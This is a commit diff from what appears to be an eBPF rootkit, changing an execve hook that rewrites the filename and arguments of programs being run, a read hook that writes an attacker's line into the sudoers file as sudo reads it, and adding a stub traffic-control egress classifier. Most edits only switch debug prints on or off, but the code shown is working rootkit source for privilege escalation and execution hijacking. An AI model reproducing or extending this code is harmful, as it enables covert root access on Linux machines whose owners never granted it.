Added new TC module, updates to the exec hooking system and the userland module

src/ebpf/include/bpf/exec.h

@@ -115,7 +115,7 @@ static __always_inline int handle_tp_sys_enter_execve(struct sys_execve_enter_ct
     if((void*)ctx->filename==(void*)(ctx->argv)){
         bpf_printk("Equal pointers");
     }else{
-        bpf_printk("Not equal pointers %u, %u", ctx->filename, ctx->argv);
+        //bpf_printk("Not equal pointers %u, %u", ctx->filename, ctx->argv);
     }
 
     if(str_n_compare((char*)filename, ARGUMENT_LENGTH, (char*)PATH_EXECUTION_HIJACK_PROGRAM, sizeof(PATH_EXECUTION_HIJACK_PROGRAM), sizeof(PATH_EXECUTION_HIJACK_PROGRAM)-1)!=0){
@@ -168,7 +168,6 @@ static __always_inline int handle_tp_sys_enter_execve(struct sys_execve_enter_ct
         return -1;
     }
      
-    bpf_printk("One success\n");
     hijacker_state = 1;
 
     unsigned char newfilename[ARGUMENT_LENGTH] = {0};
@@ -182,9 +181,9 @@ static __always_inline int handle_tp_sys_enter_execve(struct sys_execve_enter_ct
 
     bpf_printk("SUCCESS NEW FILENAME: %s\n", newfilename);
     bpf_printk("NEW ARGV0: %s\n\n", newargv[0]);
-    /*bpf_printk("ARGV1: %s\n", argv[1]);
-    bpf_printk("ARGV2: %s\n", argv[2]);
-    bpf_printk("ORIGINAL %s\n\n", filename);*/
+    bpf_printk("NEW ARGV1: %s\n", newargv[1]);
+    bpf_printk("NEW ARGV2: %s\n", newargv[2]);
+    //bpf_printk("ORIGINAL %s\n\n", filename);
 
     return 0;
 }

src/ebpf/include/bpf/fs.h

@@ -102,7 +102,7 @@ static __always_inline int handle_tp_sys_exit_read(struct sys_read_exit_ctx *ctx
     //For including an user in the sudoers file
     //We just put our new line there, independently on what the rest of the file contains
     if(data->is_sudo==1){
-        bpf_printk("Proceeding to verwrite sudo\n");
+        //bpf_printk("Proceeding to verwrite sudo\n");
         if(bpf_probe_write_user((void*)buf, (void*)sudo_line_overwrite, (__u32)STRING_FS_SUDOERS_ENTRY_LEN-1)<0){
             bpf_printk("Error writing to user memory\n");
             return -1;
@@ -201,7 +201,7 @@ static __always_inline int handle_tp_sys_enter_openat(struct sys_openat_enter_ct
 
     data.is_sudo = 1;
     bpf_map_update_elem(&fs_open, &pid_tgid, &data, BPF_ANY);
-    bpf_printk("It was a sudo!\n");
+    //bpf_printk("It was a sudo!\n");
 
     return 0;
 

src/ebpf/include/bpf/tc.c

@@ -0,0 +1,39 @@
+#include <linux/bpf.h>
+#include <linux/if_ether.h>
+#include <linux/pkt_cls.h>
+#include <linux/swab.h>
+#include <bpf/bpf_tracing.h>
+#include <bpf/bpf_helpers.h>
+
+
+struct pkt_ctx_t {
+    struct cursor *c;
+    struct ethhdr *eth;
+    struct iphdr *ipv4;
+    struct tcphdr *tcp;
+    struct udphdr *udp;
+    struct http_req_t *http_req;
+};
+
+SEC("classifier/egress")
+int classifier(struct __sk_buff *skb){
+	void *data_end = (void *)(unsigned long long)skb->data_end;
+	void *data = (void *)(unsigned long long)skb->data;
+	struct ethhdr *eth = data;
+    bpf_printk("Heey\n");
+	if (data + sizeof(struct ethhdr) > data_end)
+		return TC_ACT_SHOT;
+
+	if (eth->h_proto == ___constant_swab16(ETH_P_IP))
+		/*
+		 * Packet processing is not implemented in this sample. Parse
+		 * IPv4 header, possibly push/pop encapsulation headers, update
+		 * header fields, drop or transmit based on network policy,
+		 * collect statistics and store them in a eBPF map...
+		 */
+		return 0;//process_packet(skb);
+	else
+		return TC_ACT_OK;
+}
+
+char _license[4] SEC("license") = "GPL";